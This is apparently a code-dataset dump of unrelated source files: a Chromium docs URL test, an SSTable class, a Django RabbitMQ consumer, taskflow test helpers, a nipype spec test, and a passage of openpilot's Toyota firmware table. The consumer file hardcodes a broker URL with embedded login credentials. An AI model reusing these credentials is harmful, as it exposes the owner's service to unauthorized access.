self.check("/dev/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.DEV)
self.check("/beta/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.BETA)
self.check("/stable/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.STABLE)
self.response.out.write("<br/>Testing extension API JSON<br/>")
self.check("/trunk/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/api/bookmarks.json", Channel.TRUNK)
self.check("/dev/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.DEV)
self.check("/beta/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.BETA)
self.check("/stable/api/bookmarks.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/bookmarks.json", Channel.STABLE)
self.check("/stable/api/experimental.browsingData.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/experimental.browsingData.json", Channel.STABLE)
self.response.out.write("<br/>Testing favicon.ico<br/>")
self.check("/trunk/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.TRUNK)
self.check("/dev/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.DEV)
self.check("/beta/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.BETA)
self.check("/stable/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.STABLE)
self.response.out.write("<br/>Testing DEFAULT<br/>")
temp = Channel.DEFAULT
Channel.DEFAULT = Channel.DEV
self.check("/", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
self.check("/index.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/index.html", Channel.DEV)
self.check("/getstarted.html", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/getstarted.html", Channel.DEV)
self.check("/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.DEV)
self.check("/api/extension_api.json", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/api/extension_api.json", Channel.DEV)
self.check("/css/ApiRefStyles.css", "http://src.chromium.org/viewvc/chrome/branches/%s/src/chrome/common/extensions/docs/css/ApiRefStyles.css", Channel.DEV)
self.check("/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.DEV)
self.response.out.write("<br/>Testing DEFAULT (trunk)<br/>")
Channel.DEFAULT = Channel.TRUNK
self.check("/", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
self.check("/index.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/index.html", Channel.TRUNK)
self.check("/getstarted.html", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/getstarted.html", Channel.TRUNK)
self.check("/third_party/jstemplate/jstemplate_compiled.js", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/third_party/jstemplate/jstemplate_compiled.js", Channel.TRUNK)
self.check("/api/extension_api.json", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/api/extension_api.json", Channel.TRUNK)
self.check("/css/ApiRefStyles.css", "http://src.chromium.org/viewvc/chrome/trunk/src/chrome/common/extensions/docs/css/ApiRefStyles.css", Channel.TRUNK)
self.check("/favicon.ico", "http://src.chromium.org/favicon.ico", Channel.TRUNK)
Channel.DEFAULT = temp
return
# utility function for my unit test
# checks that getSrcUrl(path) returns the expected values
# TODO(nickbaum): can this be replaced by assert or something similar?
def check(self, path, expectedUrl, expectedChannel):
actual = self.getSrcUrl(path)
if (actual[0] != expectedUrl):
self.response.out.write('<span style="color:#f00;">Failure:</span> path ' + path + " gave url " + actual[0] + "<br/>")
elif (actual[1] != expectedChannel):
self.response.out.write('<span style="color:#f00;">Failure:</span> path ' + path + " gave branch " + actual[1].name + "<br/>")
else:
self.response.out.write("Path " + path + ' <span style="color:#0f0;">OK</span><br/>')
return
application = webapp.WSGIApplication([
('/.*', MainPage),
], debug=False)
def main():
run_wsgi_app(application)
if __name__ == '__main__':
main()
| 52.1777 | 197 | 0.678197 |
ace97f5e1a38eb3d9641bcb6a6c2b1f1b3126799 | 1,322 | py | Python | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | sstable.py | anarmanafov1/kvs | 07ef1d9dc6db64c7b24861bbadf6f556c88f1674 | [
"MIT"
] | null | null | null | from bloomfilter import BloomFilter
from binio import kv_reader, kv_writer
BF_SIZE = 10000
BF_HASH_COUNT = 5
class SSTable:
"""Represents a Sorted-String-Table (SSTable) on disk"""
def __init__(self, path, bf=None):
self.path = path
self.bf = bf
if not self.bf:
self._sync()
def _sync(self):
self.bf = BloomFilter(BF_SIZE, BF_HASH_COUNT)
with kv_reader(self.path) as r:
while r.has_next():
key = r.read_key()
self.bf.add(key)
r.skip_value()
@classmethod
def create(cls, path, memtable):
bf = BloomFilter(BF_SIZE, BF_HASH_COUNT)
with kv_writer(path) as writer:
for key, value in memtable.entries():
writer.write_entry(key, value)
bf.add(key)
return cls(path, bf)
def search(self, search_key):
if not self.bf.exists(search_key):
return None
with kv_reader(self.path) as r:
while r.has_next():
key = r.read_key()
# stop if the key is too big
if key > search_key:
return None
if key == search_key:
return r.read_value()
r.skip_value()
return None
| 28.12766 | 60 | 0.535552 |
ace97fb9966f44bf704312095af6cff30ce0af45 | 794 | py | Python | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | admin/consumer.py | EricGip/PythonMicroServices | f0d7df9a21f981af053faba922accb23cdee9c09 | [
"MIT"
] | null | null | null | import pika, json, os, django
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "admin.settings")
django.setup()
from products.models import Product
params = pika.URLParameters("amqps://tmgmrdcf:qjgjxvX7aESgpI2NnzRRWeKrLgq9fLsB@shark.rmq.cloudamqp.com/tmgmrdcf")
connection = pika.BlockingConnection(params)
channel = connection.channel()
channel.queue_declare(queue='admin')
def callback(ch, method, properties, body):
print("Received in admin")
id = json.loads(body)
print(id)
product = Product.objects.get(id=id)
product.likes = product.likes + 1
product.save()
print("Product likes increased")
channel.basic_consume(queue="admin", on_message_callback=callback, auto_ack=True)
print("Consumption successful")
channel.start_consuming()
channel.close() | 24.060606 | 113 | 0.755668 |
ace97fc1c37965251237533be49338c23a9fecad | 10,361 | py | Python | taskflow/test.py | JonasMie/taskflow | 942bb76d9cf69a87e7c78f0e231ce9b94e69bb37 | [
"Apache-2.0"
] | null | null | null | taskflow/test.py | JonasMie/taskflow | 942bb76d9cf69a87e7c78f0e231ce9b94e69bb37 | [
"Apache-2.0"
] | 1 | 2020-12-16T12:48:32.000Z | 2020-12-16T12:48:32.000Z | taskflow/test.py | jimbobhickville/taskflow | 6ea991ce94f5be46b7e4726b4c4f014e10407786 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2012 Yahoo! Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import absolute_import
import collections
import logging
import fixtures
import mock
from oslotest import base
import six
from testtools import compat
from testtools import matchers
from testtools import testcase
from taskflow import exceptions
from taskflow.tests import utils
from taskflow.utils import misc
class GreaterThanEqual(object):
"""Matches if the item is geq than the matchers reference object."""
def __init__(self, source):
self.source = source
def match(self, other):
if other >= self.source:
return None
return matchers.Mismatch("%s was not >= %s" % (other, self.source))
class FailureRegexpMatcher(object):
"""Matches if the failure was caused by the given exception and message.
This will match if a given failure contains and exception of the given
class type and if its string message matches to the given regular
expression pattern.
"""
def __init__(self, exc_class, pattern):
self.exc_class = exc_class
self.pattern = pattern
def match(self, failure):
for cause in failure:
if cause.check(self.exc_class) is not None:
return matchers.MatchesRegex(
self.pattern).match(cause.exception_str)
return matchers.Mismatch("The `%s` wasn't caused by the `%s`" %
(failure, self.exc_class))
class ItemsEqual(object):
"""Matches the items in two sequences.
This matcher will validate that the provided sequence has the same elements
as a reference sequence, regardless of the order.
"""
def __init__(self, seq):
self._seq = seq
self._list = list(seq)
def match(self, other):
other_list = list(other)
extra = misc.sequence_minus(other_list, self._list)
missing = misc.sequence_minus(self._list, other_list)
if extra or missing:
msg = ("Sequences %s and %s do not have same items."
% (self._seq, other))
if missing:
msg += " Extra items in first sequence: %s." % missing
if extra:
msg += " Extra items in second sequence: %s." % extra
return matchers.Mismatch(msg)
return None
class TestCase(base.BaseTestCase):
"""Test case base class for all taskflow unit tests."""
def makeTmpDir(self):
t_dir = self.useFixture(fixtures.TempDir())
return t_dir.path
def assertDictEqual(self, expected, check):
self.assertIsInstance(expected, dict,
'First argument is not a dictionary')
self.assertIsInstance(check, dict,
'Second argument is not a dictionary')
# Testtools seems to want equals objects instead of just keys?
compare_dict = {}
for k in list(six.iterkeys(expected)):
if not isinstance(expected[k], matchers.Equals):
compare_dict[k] = matchers.Equals(expected[k])
else:
compare_dict[k] = expected[k]
self.assertThat(matchee=check,
matcher=matchers.MatchesDict(compare_dict))
def assertRaisesAttrAccess(self, exc_class, obj, attr_name):
def access_func():
getattr(obj, attr_name)
self.assertRaises(exc_class, access_func)
def assertRaisesRegex(self, exc_class, pattern, callable_obj,
*args, **kwargs):
# TODO(harlowja): submit a pull/review request to testtools to add
# this method to there codebase instead of having it exist in ours
# since it really doesn't belong here.
class ReRaiseOtherTypes(object):
def match(self, matchee):
if not issubclass(matchee[0], exc_class):
compat.reraise(*matchee)
class CaptureMatchee(object):
def match(self, matchee):
self.matchee = matchee[1]
capture = CaptureMatchee()
matcher = matchers.Raises(matchers.MatchesAll(ReRaiseOtherTypes(),
matchers.MatchesException(exc_class,
pattern),
capture))
our_callable = testcase.Nullary(callable_obj, *args, **kwargs)
self.assertThat(our_callable, matcher)
return capture.matchee
def assertGreater(self, first, second):
matcher = matchers.GreaterThan(first)
self.assertThat(second, matcher)
def assertGreaterEqual(self, first, second):
matcher = GreaterThanEqual(first)
self.assertThat(second, matcher)
def assertRegexpMatches(self, text, pattern):
matcher = matchers.MatchesRegex(pattern)
self.assertThat(text, matcher)
def assertIsSuperAndSubsequence(self, super_seq, sub_seq, msg=None):
super_seq = list(super_seq)
sub_seq = list(sub_seq)
current_tail = super_seq
for sub_elem in sub_seq:
try:
super_index = current_tail.index(sub_elem)
except ValueError:
# element not found
if msg is None:
msg = ("%r is not subsequence of %r: "
"element %r not found in tail %r"
% (sub_seq, super_seq, sub_elem, current_tail))
self.fail(msg)
else:
current_tail = current_tail[super_index + 1:]
def assertFailuresRegexp(self, exc_class, pattern, callable_obj, *args,
**kwargs):
"""Asserts the callable failed with the given exception and message."""
try:
with utils.wrap_all_failures():
callable_obj(*args, **kwargs)
except exceptions.WrappedFailure as e:
self.assertThat(e, FailureRegexpMatcher(exc_class, pattern))
def assertItemsEqual(self, seq1, seq2, msg=None):
matcher = ItemsEqual(seq1)
self.assertThat(seq2, matcher)
class MockTestCase(TestCase):
def setUp(self):
super(MockTestCase, self).setUp()
self.master_mock = mock.Mock(name='master_mock')
def patch(self, target, autospec=True, **kwargs):
"""Patch target and attach it to the master mock."""
f = self.useFixture(fixtures.MockPatch(target,
autospec=autospec, **kwargs))
mocked = f.mock
attach_as = kwargs.pop('attach_as', None)
if attach_as is not None:
self.master_mock.attach_mock(mocked, attach_as)
return mocked
def patchClass(self, module, name, autospec=True, attach_as=None):
"""Patches a modules class.
This will create a class instance mock (using the provided name to
find the class in the module) and attach a mock class the master mock
to be cleaned up on test exit.
"""
if autospec:
instance_mock = mock.Mock(spec_set=getattr(module, name))
else:
instance_mock = mock.Mock()
f = self.useFixture(fixtures.MockPatchObject(module, name,
autospec=autospec))
class_mock = f.mock
class_mock.return_value = instance_mock
if attach_as is None:
attach_class_as = name
attach_instance_as = name.lower()
else:
attach_class_as = attach_as + '_class'
attach_instance_as = attach_as
self.master_mock.attach_mock(class_mock, attach_class_as)
self.master_mock.attach_mock(instance_mock, attach_instance_as)
return class_mock, instance_mock
def resetMasterMock(self):
self.master_mock.reset_mock()
class CapturingLoggingHandler(logging.Handler):
"""A handler that saves record contents for post-test analysis."""
def __init__(self, level=logging.DEBUG):
# It seems needed to use the old style of base class calling, we
# can remove this old style when we only support py3.x
logging.Handler.__init__(self, level=level)
self._records = []
@property
def counts(self):
"""Returns a dictionary with the number of records at each level."""
self.acquire()
try:
captured = collections.defaultdict(int)
for r in self._records:
captured[r.levelno] += 1
return captured
finally:
self.release()
@property
def messages(self):
"""Returns a dictionary with list of record messages at each level."""
self.acquire()
try:
captured = collections.defaultdict(list)
for r in self._records:
captured[r.levelno].append(r.getMessage())
return captured
finally:
self.release()
@property
def exc_infos(self):
"""Returns a list of all the record exc_info tuples captured."""
self.acquire()
try:
captured = []
for r in self._records:
if r.exc_info:
captured.append(r.exc_info)
return captured
finally:
self.release()
def emit(self, record):
self.acquire()
try:
self._records.append(record)
finally:
self.release()
def reset(self):
"""Resets *all* internally captured state."""
self.acquire()
try:
self._records = []
finally:
self.release()
def close(self):
logging.Handler.close(self)
self.reset()
| 34.082237 | 79 | 0.603127 |
ace97fc8f70b4eb93ae272c5575e89074715483c | 2,586 | py | Python | nipype/interfaces/camino/tests/test_auto_TrackDT.py | vferat/nipype | 536c57da150d157dcb5c121af43aaeab71cdbd5f | [
"Apache-2.0"
] | null | null | null | nipype/interfaces/camino/tests/test_auto_TrackDT.py | vferat/nipype | 536c57da150d157dcb5c121af43aaeab71cdbd5f | [
"Apache-2.0"
] | 2 | 2018-04-17T19:18:16.000Z | 2020-03-04T22:05:02.000Z | nipype/interfaces/camino/tests/test_auto_TrackDT.py | oesteban/nipype | c14f24eba1da08711bbb894e049ee858ed740096 | [
"Apache-2.0"
] | null | null | null | # AUTO-GENERATED by tools/checkspecs.py - DO NOT EDIT
from __future__ import unicode_literals
from ..dti import TrackDT
def test_TrackDT_inputs():
input_map = dict(
anisfile=dict(
argstr='-anisfile %s',
extensions=None,
),
anisthresh=dict(argstr='-anisthresh %f', ),
args=dict(argstr='%s', ),
curveinterval=dict(
argstr='-curveinterval %f',
requires=['curvethresh'],
),
curvethresh=dict(argstr='-curvethresh %f', ),
data_dims=dict(
argstr='-datadims %s',
units='voxels',
),
environ=dict(
nohash=True,
usedefault=True,
),
gzip=dict(argstr='-gzip', ),
in_file=dict(
argstr='-inputfile %s',
extensions=None,
position=1,
),
inputdatatype=dict(argstr='-inputdatatype %s', ),
inputmodel=dict(
argstr='-inputmodel %s',
usedefault=True,
),
interpolator=dict(argstr='-interpolator %s', ),
ipthresh=dict(argstr='-ipthresh %f', ),
maxcomponents=dict(
argstr='-maxcomponents %d',
units='NA',
),
numpds=dict(
argstr='-numpds %d',
units='NA',
),
out_file=dict(
argstr='-outputfile %s',
extensions=None,
genfile=True,
position=-1,
),
output_root=dict(
argstr='-outputroot %s',
extensions=None,
position=-1,
),
outputtracts=dict(argstr='-outputtracts %s', ),
seed_file=dict(
argstr='-seedfile %s',
extensions=None,
position=2,
),
stepsize=dict(
argstr='-stepsize %f',
requires=['tracker'],
),
tracker=dict(
argstr='-tracker %s',
usedefault=True,
),
voxel_dims=dict(
argstr='-voxeldims %s',
units='mm',
),
)
inputs = TrackDT.input_spec()
for key, metadata in list(input_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(inputs.traits()[key], metakey) == value
def test_TrackDT_outputs():
output_map = dict(tracked=dict(extensions=None, ), )
outputs = TrackDT.output_spec()
for key, metadata in list(output_map.items()):
for metakey, value in list(metadata.items()):
assert getattr(outputs.traits()[key], metakey) == value
| 28.733333 | 67 | 0.509667 |
ace980a324bd4893c4e08070cacb443f4a3f1d67 | 72,900 | py | Python | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | selfdrive/car/toyota/values.py | osilverstein/openpilot | adcfa4dcc49c7da77ad35223a84dbe8961d375a7 | [
"MIT"
] | null | null | null | from collections import defaultdict
from enum import IntFlag
from cereal import car
from selfdrive.car import dbc_dict
from selfdrive.config import Conversions as CV
Ecu = car.CarParams.Ecu
MIN_ACC_SPEED = 19. * CV.MPH_TO_MS
PEDAL_TRANSITION = 10. * CV.MPH_TO_MS
class CarControllerParams:
ACCEL_MAX = 1.5 # m/s2, lower than allowed 2.0 m/s2 for tuning reasons
ACCEL_MIN = -3.5 # m/s2
STEER_MAX = 1500
STEER_DELTA_UP = 10 # 1.5s time to peak torque
STEER_DELTA_DOWN = 25 # always lower than 45 otherwise the Rav4 faults (Prius seems ok with 50)
STEER_ERROR_MAX = 350 # max delta between torque cmd and torque motor
class ToyotaFlags(IntFlag):
HYBRID = 1
class CAR:
# Toyota
ALPHARD_TSS2 = "TOYOTA ALPHARD 2020"
AVALON = "TOYOTA AVALON 2016"
AVALON_2019 = "TOYOTA AVALON 2019"
AVALONH_2019 = "TOYOTA AVALON HYBRID 2019"
AVALON_TSS2 = "TOYOTA AVALON 2022"
CAMRY = "TOYOTA CAMRY 2018"
CAMRYH = "TOYOTA CAMRY HYBRID 2018"
CAMRY_TSS2 = "TOYOTA CAMRY 2021" # TSS 2.5
CAMRYH_TSS2 = "TOYOTA CAMRY HYBRID 2021"
CHR = "TOYOTA C-HR 2018"
CHRH = "TOYOTA C-HR HYBRID 2018"
COROLLA = "TOYOTA COROLLA 2017"
COROLLA_TSS2 = "TOYOTA COROLLA TSS2 2019"
# LSS2 Lexus UX Hybrid is same as a TSS2 Corolla Hybrid
COROLLAH_TSS2 = "TOYOTA COROLLA HYBRID TSS2 2019"
HIGHLANDER = "TOYOTA HIGHLANDER 2017"
HIGHLANDER_TSS2 = "TOYOTA HIGHLANDER 2020"
HIGHLANDERH = "TOYOTA HIGHLANDER HYBRID 2018"
HIGHLANDERH_TSS2 = "TOYOTA HIGHLANDER HYBRID 2020"
PRIUS = "TOYOTA PRIUS 2017"
PRIUS_V = "TOYOTA PRIUS v 2017"
PRIUS_TSS2 = "TOYOTA PRIUS TSS2 2021"
RAV4 = "TOYOTA RAV4 2017"
RAV4H = "TOYOTA RAV4 HYBRID 2017"
RAV4_TSS2 = "TOYOTA RAV4 2019"
RAV4H_TSS2 = "TOYOTA RAV4 HYBRID 2019"
MIRAI = "TOYOTA MIRAI 2021" # TSS 2.5
SIENNA = "TOYOTA SIENNA 2018"
# Lexus
LEXUS_CTH = "LEXUS CT HYBRID 2018"
LEXUS_ESH = "LEXUS ES HYBRID 2018"
LEXUS_ES_TSS2 = "LEXUS ES 2019"
LEXUS_ESH_TSS2 = "LEXUS ES HYBRID 2019"
LEXUS_IS = "LEXUS IS 2018"
LEXUS_NX = "LEXUS NX 2018"
LEXUS_NXH = "LEXUS NX HYBRID 2018"
LEXUS_NX_TSS2 = "LEXUS NX 2020"
LEXUS_RC = "LEXUS RC 2020"
LEXUS_RX = "LEXUS RX 2016"
LEXUS_RXH = "LEXUS RX HYBRID 2017"
LEXUS_RX_TSS2 = "LEXUS RX 2020"
LEXUS_RXH_TSS2 = "LEXUS RX HYBRID 2020"
# (addr, cars, bus, 1/freq*100, vl)
STATIC_DSU_MSGS = [
(0x128, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.AVALON), 1, 3, b'\xf4\x01\x90\x83\x00\x37'),
(0x128, (CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH), 1, 3, b'\x03\x00\x20\x00\x00\x52'),
(0x141, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 1, 2, b'\x00\x00\x00\x46'),
(0x160, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 1, 7, b'\x00\x00\x08\x12\x01\x31\x9c\x51'),
(0x161, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.AVALON, CAR.LEXUS_RX, CAR.PRIUS_V), 1, 7, b'\x00\x1e\x00\x00\x00\x80\x07'),
(0X161, (CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH), 1, 7, b'\x00\x1e\x00\xd4\x00\x00\x5b'),
(0x283, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 3, b'\x00\x00\x00\x00\x00\x00\x8c'),
(0x2E6, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0, 3, b'\xff\xf8\x00\x08\x7f\xe0\x00\x4e'),
(0x2E7, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0, 3, b'\xa8\x9c\x31\x9c\x00\x00\x00\x02'),
(0x33E, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH), 0, 20, b'\x0f\xff\x26\x40\x00\x1f\x00'),
(0x344, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 5, b'\x00\x00\x01\x00\x00\x00\x00\x50'),
(0x365, (CAR.PRIUS, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.HIGHLANDERH), 0, 20, b'\x00\x00\x00\x80\x03\x00\x08'),
(0x365, (CAR.RAV4, CAR.RAV4H, CAR.COROLLA, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 20, b'\x00\x00\x00\x80\xfc\x00\x08'),
(0x366, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.HIGHLANDERH), 0, 20, b'\x00\x00\x4d\x82\x40\x02\x00'),
(0x366, (CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 20, b'\x00\x72\x07\xff\x09\xfe\x00'),
(0x470, (CAR.PRIUS, CAR.LEXUS_RXH), 1, 100, b'\x00\x00\x02\x7a'),
(0x470, (CAR.HIGHLANDER, CAR.HIGHLANDERH, CAR.RAV4H, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.PRIUS_V), 1, 100, b'\x00\x00\x01\x79'),
(0x4CB, (CAR.PRIUS, CAR.RAV4H, CAR.LEXUS_RXH, CAR.LEXUS_NXH, CAR.LEXUS_NX, CAR.RAV4, CAR.COROLLA, CAR.HIGHLANDERH, CAR.HIGHLANDER, CAR.AVALON, CAR.SIENNA, CAR.LEXUS_CTH, CAR.LEXUS_ESH, CAR.LEXUS_RX, CAR.PRIUS_V), 0, 100, b'\x0c\x00\x00\x00\x00\x00\x00\x00'),
]
FW_VERSIONS = {
CAR.AVALON: {
(Ecu.esp, 0x7b0, None): [
b'F152607060\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510701300\x00\x00\x00\x00',
b'881510705100\x00\x00\x00\x00',
b'881510705200\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41051\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x7e0, None): [
b'\x0230721100\x00\x00\x00\x00\x00\x00\x00\x00A0C01000\x00\x00\x00\x00\x00\x00\x00\x00',
b'\x0230721200\x00\x00\x00\x00\x00\x00\x00\x00A0C01000\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702000\x00\x00\x00\x00',
b'8821F4702100\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0701100\x00\x00\x00\x00',
b'8646F0703000\x00\x00\x00\x00',
],
},
CAR.AVALON_2019: {
(Ecu.esp, 0x7b0, None): [
b'F152607140\x00\x00\x00\x00\x00\x00',
b'F152607171\x00\x00\x00\x00\x00\x00',
b'F152607110\x00\x00\x00\x00\x00\x00',
b'F152607180\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510703200\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41080\x00\x00\x00\x00\x00\x00',
b'8965B07010\x00\x00\x00\x00\x00\x00',
b'8965B41090\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630725200\x00\x00\x00\x00',
b'\x01896630725300\x00\x00\x00\x00',
b'\x01896630735100\x00\x00\x00\x00',
b'\x01896630738000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0702100\x00\x00\x00\x00',
],
},
CAR.AVALONH_2019: {
(Ecu.esp, 0x7b0, None): [
b'F152641040\x00\x00\x00\x00\x00\x00',
b'F152641061\x00\x00\x00\x00\x00\x00',
b'F152641050\x00\x00\x00\x00\x00\x00',
],
(Ecu.dsu, 0x791, None): [
b'881510704200\x00\x00\x00\x00',
b'881514107100\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B07010\x00\x00\x00\x00\x00\x00',
b'8965B41090\x00\x00\x00\x00\x00\x00',
b'8965B41070\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x02896630724000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
b'\x02896630737000\x00\x00\x00\x00897CF3305001\x00\x00\x00\x00',
b'\x02896630728000\x00\x00\x00\x00897CF3302002\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'8821F4702300\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'8646F0702100\x00\x00\x00\x00',
],
},
CAR.AVALON_TSS2: {
(Ecu.esp, 0x7b0, None): [
b'\x01F152607280\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7a1, None): [
b'8965B41110\x00\x00\x00\x00\x00\x00',
],
(Ecu.engine, 0x700, None): [
b'\x01896630742000\x00\x00\x00\x00',
],
(Ecu.fwdRadar, 0x750, 0xf): [
b'\x018821F6201200\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x750, 0x6d): [
b'\x028646F4104100\x00\x00\x00\x008646G5301200\x00\x00\x00\x00',
],
},
CAR.CAMRY: {
(Ecu.engine, 0x700, None): [
b'\x018966306L3100\x00\x00\x00\x00',
b'\x018966306L4200\x00\x00\x00\x00',
b'\x018966306L5200\x00\x00\x00\x00',
b'\x018966306P8000\x00\x00\x00\x00',
b'\x018966306Q3100\x00\x00\x00\x00',
b'\x018966306Q4000\x00\x00\x00\x00',
b'\x018966306Q4100\x00\x00\x00\x00',
b'\x018966306Q4200\x00\x00\x00\x00',
b'\x018966333Q9200\x00\x00\x00\x00',
b'\x018966333P3100\x00\x00\x00\x00',
b'\x018966333P3200\x00\x00\x00\x00',
b'\x018966333P4200\x00\x00\x00\x00',
b'\x018966333P4300\x00\x00\x00\x00',
b'\x018966333P4400\x00\x00\x00\x00',
b'\x018966333P4500\x00\x00\x00\x00',
b'\x018966333P4700\x00\x00\x00\x00',
